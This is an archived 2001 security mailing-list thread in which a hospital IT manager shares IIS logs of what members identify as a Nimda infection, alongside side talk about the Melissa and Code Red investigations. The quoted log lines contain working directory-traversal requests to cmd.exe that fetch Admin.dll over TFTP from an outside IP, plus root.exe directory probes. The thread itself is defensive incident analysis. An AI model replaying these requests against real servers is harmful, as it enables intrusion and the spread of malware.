Mike, Sorry for the broken link, here is a working one, http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/ website/defendwb.asp I believe that IIS rel 3.0 is not a very well support release and that you should probably consider upgrading to something a little more current. NT 4 at the sp3 level also has many other security issues. Doug > -----Original Message----- > From: owner-crime@/var/spool/majordomo/lists/crime > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of dldean > Sent: Friday, September 21, 2001 2:47 PM > To: J.Michael Cuciti; Kuo Jimmy > Cc: crime@private > Subject: RE: [RE: [RE: Any leads?]] > > > Mike, > > Here is a good starting place > > http://www.microsoft.com/technet/treeview/default.asp?url=/technet > /itsolutio > > This link is for a Microsoft TechNet page describing security > issue for web > sites. They also have a "batten down the hatches" script for IIS but I > cannot find the url for that page. > > > Doug > > -----Original Message----- > > From: owner-crime@/var/spool/majordomo/lists/crime > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of > > J.Michael Cuciti > > Sent: Friday, September 21, 2001 2:33 PM > > To: dldean; Kuo Jimmy > > Cc: crime@private > > Subject: Re: [RE: [RE: Any leads?]] > > > > > > Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the > > directories > > the event view is referencing do not exist on my system. I have > > followed all > > instruction for removal from variuos postings from CRIME. No > > file refernced > > in posting are on my system. > > > > Do any of you know how I might stop this attack? > > > > -Mike > > > > > > > > dldean@private (dldean) wrote: > > This is 206.98.124.52 receiving get requests for the admin.dll from > > 206.98.79.246 and directory requests for his machine from > > 206.252.224.50 & > > 208.238.181.162 . > > > > Doug > > > > > -----Original Message----- > > > From: owner-crime@/var/spool/majordomo/lists/crime > > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, > > > Jimmy > > > Sent: Friday, September 21, 2001 2:06 PM > > > Cc: crime@private > > > Subject: RE: [RE: Any leads?] > > > > > > > > > Oh, I didn't notice the followup questions you asked the first time. > > > > > > I don't know about the structure of your logs. But are you > > 206.98.124.52? > > > > > > Could someone who reads IIS logs say if this is him sending > or receiving > > > GETs? > > > > > > And this is definitely Nimda. I just don't know if you're the > > > target or the > > > culprit. If you haven't upgraded, I'm tempting to believe > > you're infected > > > and attacking others. The TFTP command shows up only on or after > > > infection. > > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something > > > that shows > > > up after infection. But then you say you don't have it... > > > > > > Jimmy > > > > > > > -----Original Message----- > > > > From: J.Michael Cuciti [SMTP:mcuciti@private] > > > > Sent: Friday, September 21, 2001 1:44 PM > > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > > > > Cc: crime@private > > > > Subject: Re: [RE: Any leads?] > > > > > > > > All: > > > > > > > > I still have a script trying to run, but the location and > > folder doesn't > > > > exist. The is what I found in my log file: > > > > > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, > > 206.98.124.52, 150, 151, > > > > 304, > > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > > > > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, > > 206.98.124.52, 180, 151, > > > > 304, > > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > > > > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, > > 206.98.124.52, 10, 72, > > > > 273, > > > > 403, 5, GET, /scripts/root.exe, /c+dir, > > > > > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, > > 206.98.124.52, 80, 96, > > > > 1652, > > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > > > > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, > > 206.98.124.52, 10, 97, > > > > 243, > > > > 500, 123, GET, /scripts/..A ../winnt/system32/cmd.exe, /c+dir, > > > > > > > > If anybody knows what this is, please 'spain it to me. > > > > > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I > > > inherited this, not > > > > my > > > > fault :-) ) > > > > > > > > In the event log I see this same type of message running every few > > > > minutes. > > > > The script is supposedly running from > > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > > > > > > > Thanks... > > > > > > > > Mike Cuciti > > > > Network Service and Support MAnager > > > > Tuality Healthcare > > > > 681.1749 > > > > > > > > > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > > > > >The Melissa author was caught because he posted the infectious > > > document > > > > >from his own AOL account to a news group, rather than releasing it > > > > >through a hacked account. His guilt was confirmed when the > > > serial number > > > > >in the document matched the PC in the dumpster outside his > > bedroom :-) > > > > > > > > No. He used a hacked acct. But we identified the exact time > > of the use > > > > of > > > > the acct (newsgroup posting message ID) and the FBI traced the phone > > > > records. > > > > > > > > And the PC was destroyed and never located. > > > > > > > > Where did you get your version of the story? > > > > > > > > >But Code Red and its derivatives is not an Office document, and > > > > >therefore has no serial numbers. That investigators appear > to have no > > > > >leads months after Code Red appeared tells me that it was likely > > > > >released to the wild from a compromised machine, or perhaps > > > > >simultaneously released from multiple compromised machines. If the > > > > >author(s) were good, then those compromised machines were initially > > > > >attacked from other compromised machines. Likely all of > these initial > > > > >release vector machines have long since been wiped and > > > re-installed, and > > > > >the links to the author(s) have been cut. > > > > > > > > We have some "first instances" of traffic. I don't know what > > the FBI's > > > > doing with the information gathered so far. But I agree that it's > > > > difficult > > > > and not likely. > > > > > > > > Jimmy > > > > > > > > > > >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:49 PDT